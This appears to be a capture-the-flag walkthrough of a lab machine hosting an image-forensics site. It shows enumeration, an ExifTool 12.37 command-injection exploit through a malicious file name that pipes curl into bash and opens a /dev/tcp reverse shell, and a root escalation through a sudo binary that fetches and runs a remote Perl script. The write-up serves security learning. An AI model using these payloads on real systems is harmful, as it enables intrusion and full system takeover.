Enumeration
Rustscan
Copy mkdir rust ; sudo rustscan -t 1500 -b 1500 --ulimit 65000 -a 10.129.87.222 -- -sV -sC -oA ./rust/{{ip}}
Copy Open 10.129.11.68:22
Open 10.129.11.68:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux ; protocol 2.0 )
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| _http-title: Did not follow redirect to http://eforenzics.htb/
| http-methods:
| _ Supported Methods: GET HEAD POST OPTIONS
| _http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: eforenzics.htb ; OS: Linux ; CPE: cpe:/o:linux:linux_kernel
Dirsearch
Copy dirsearch -u http://eforenzics.htb/
Copy [20:42:57] Starting:
[20:43:24] 301 - 317B - /assets - > http://eforenzics.htb/assets/
[20:43:24] 403 - 279B - /assets/
[20:43:41] 200 - 11KB - /index.html
[20:44:08] 200 - 4KB - /upload.php
Website
Checking the Website we notice that there's a service that they offer located at http://eforenzics.htb/service.html .
The service is described as Image Forensics . You are able to upload an image file and they will provide a detailed forensic analysis.
Uploading an image will result in a report that you can view.
Example
Copy ExifTool Version Number : 12.37
File Name : image.jpg
Directory : .
File Size : 335 bytes
File Modification Date/Time : 2023:01:23 20:03:07+00:00
File Access Date/Time : 2023:01:23 20:03:07+00:00
File Inode Change Date/Time : 2023:01:23 20:03:07+00:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Exif Byte Order : Big-endian (Motorola, MM )
X Resolution : 72
Y Resolution : 72
Resolution Unit : inches
Y Cb Cr Positioning : Centered
DjVu Version : 0.24
Spatial Resolution : 300
Gamma : 2.2
Orientation : Horizontal (normal)
Warning : Ignored invalid metadata entry ( s )
Image Width : 1
Image Height : 1
Encoding Process : Extended sequential DCT, arithmetic coding
Bits Per Sample : 8
Color Components : 1
Image Size : 1x1
Megapixels : 0.000001
The first line shows us the used ExifTool Version which is 12.37. If you look this up you'll come across Command Injection: Exiftool before 12.38
Exploitation
Using the discovered vulnerability we will try to gain a shell on our target.
Exiftool 12.37
Copy # Generate malicious filename
cp image.jpg 'curl 10.10.14.71 | bash |'
# Generate an index.html containing our reverse shell code
cat index.html
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.71/4444 0>&1"
# Host a webserver
python -m http.server 80
# In another tab create a listener
pwncat-cs -lp 4444
Enumeration
After we received our shell it's time to enumerate the systmen as we are just the www-data user without any further permissions.
Linpeas
Linpeas will show us a cronjob that runs regularly at a specific time and uses a script located at /usr/local/investigation .
Inside that folder we will find an E-Mail that contains a Windows Security Log .
Cronjob
Copy */5 * * * * date >> /usr/local/investigation/analysed_log && echo "Clearing folders" >> /usr/local/investigation/analysed_log && rm -r /var/www/uploads/* && rm /var/www/html/analysed_images/*
Password Discovery
By searching the security.evtx file we come across something that looks like a password which is stored under TargetUserName .
Copy # Convert .evtx to xml
python3 /home/mrk/.local/bin/evtx_dump.py ~/Downloads/security.evtx > events.xml
# Searching
grep "TargetUserName" events.xml | sort -u
...
< Data Name = "TargetUserName" > aanderson < /Data >
< Data Name = "TargetUserName" > AAnderson < /Data >
< Data Name = "TargetUserName" > Administrators < /Data >
< Data Name = "TargetUserName" > CENSORED < /Data >
< Data Name = "TargetUserName" > EFORENZICS-DI $ < /Data >
< Data Name = "TargetUserName" > hmarley < /Data >
< Data Name = "TargetUserName" > HMarley < /Data >
< Data Name = "TargetUserName" > hmraley < /Data >
< Data Name = "TargetUserName" > ljenkins < /Data >
< Data Name = "TargetUserName" > LJenkins < /Data >
< Data Name = "TargetUserName" > lmonroe < /Data >
< Data Name = "TargetUserName" > LMonroe < /Data >
< Data Name = "TargetUserName" > LOCAL SERVICE </Data>
Privilege Escalation: smorton
Using the password we are able to switch from www-data to smorton .
Privilege Escalation
Enumeration
Checking the permissiosn of smorton reveals that we are able to run /usr/bin/binary as root.
Copy smorton@investigation:~$ sudo -l
Matching Defaults entries for smorton on investigation:
env_reset, mail_badpass, secure_path=/usr/local/sbin \: /usr/local/bin \: /usr/sbin \: /usr/bin \: /sbin \: /bin \: /snap/bin
User smorton may run the following commands on investigation:
( root ) NOPASSWD: /usr/bin/binary
Analyzing /usr/bin/binary
Executing the binary does result in receiving the text Exiting...
We pull that binary to our machine and use Cutter to take a look at the decompiled code.
Snippet of decompiled function: main
Copy if (argc != 3 ) {
puts( "Exiting... " ) ;
exit( 0 ) ;
}
iVar1 = getuid ();
if (iVar1 != 0 ) {
puts( "Exiting... " ) ;
exit( 0 ) ;
}
iVar1 = strcmp (argv[ 2 ] , "lDnxUysaQn" );
if (iVar1 == 0 ) {
puts( "Running... " ) ;
uVar2 = fopen(argv[ 2 ] , 0x 2027 ) ;
uVar3 = curl_easy_init() ;
curl_easy_setopt(uVar3 , 0x 2712 , argv[ 1 ]) ;
curl_easy_setopt(uVar3 , 0x 2711 , uVar2) ;
curl_easy_setopt(uVar3 , 0x 2d , 1 ) ;
iVar1 = curl_easy_perform(uVar3) ;
if (iVar1 == 0 ) {
iVar1 = snprintf( 0 , 0 , 0x 202a , argv[ 2 ]) ;
uVar4 = malloc(( int64_t )iVar1 + 1 ) ;
snprintf(uVar4 , ( int64_t )iVar1 + 1 , 0x 202a , argv[ 2 ]) ;
iVar1 = snprintf( 0 , 0 , "perl ./ %s " , uVar4) ;
uVar5 = malloc(( int64_t )iVar1 + 1 ) ;
snprintf(uVar5 , ( int64_t )iVar1 + 1 , "perl ./ %s " , uVar4) ;
fclose(uVar2) ;
. plt . sec ( uVar3 );
setuid( 0 ) ;
system(uVar5) ;
system( "rm -f ./lDnxUysaQn" ) ;
return 0 ;
}
puts( "Exiting... " ) ;
exit( 0 ) ;
}
puts ( "Exiting... " );
exit ( 0 );
return 0 ;
I'm not a pro at asm or c but looking at the code it's clear to me that we have to:
Provide 2 additional arguments
argv[1] should be a perl script hosted on a web resource
argv[2] has to be the string lDnxUysaQn
Become Root
root.pl
Let's prepare a simple perl script to get a root shell
Python Webserver
Host a webserver to serve that file
Copy python3 -m http.server 8080
Privilege Escalation
The fun part, let's become root
Copy smorton@investigation:~$ /bin/sudo /usr/bin/binary http://10.10.14.52:8080/root.pl lDnxUysaQn
Running...
root@investigation:/home/smorton# whoami
root